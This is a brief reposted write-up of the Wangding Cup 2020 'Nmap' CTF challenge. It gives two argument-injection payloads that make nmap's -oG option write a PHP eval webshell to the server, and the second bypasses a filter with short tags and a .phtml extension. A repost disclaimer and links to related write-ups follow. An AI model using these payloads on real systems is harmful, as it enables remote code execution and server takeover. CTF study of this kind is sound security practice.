[網鼎杯 2020 朱雀組]Nmap

本文轉載自查看原文 2020-09-04 16:15 541 CTF_刷題

Nmap -oG 可以寫入文件因此我們可以寫入一句話木馬

payload如下

' <?php @eval($_POST["hack"]);?> -oG hack.php '

結果回顯hacker php被過濾因此考慮用短標簽繞過

' <?= @eval($_POST["pd"]);?> -oG pd.phtml '

用蟻劍連接即可

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 [網鼎杯 2020 朱雀組]Nmap [網鼎杯 2020 朱雀組]Nmap 1 [網鼎杯 2020 朱雀組]Nmap [網鼎杯 2020 朱雀組]phpweb [網鼎杯 2020 朱雀組]phpweb 2020網鼎杯朱雀組 phpweb 網鼎2020朱雀組 PHP_web+NMAP [網鼎杯 2020 朱雀組]Think Java 【網鼎杯2020朱雀組】Web WriteUp [網鼎杯2020朱雀組]Web部分wp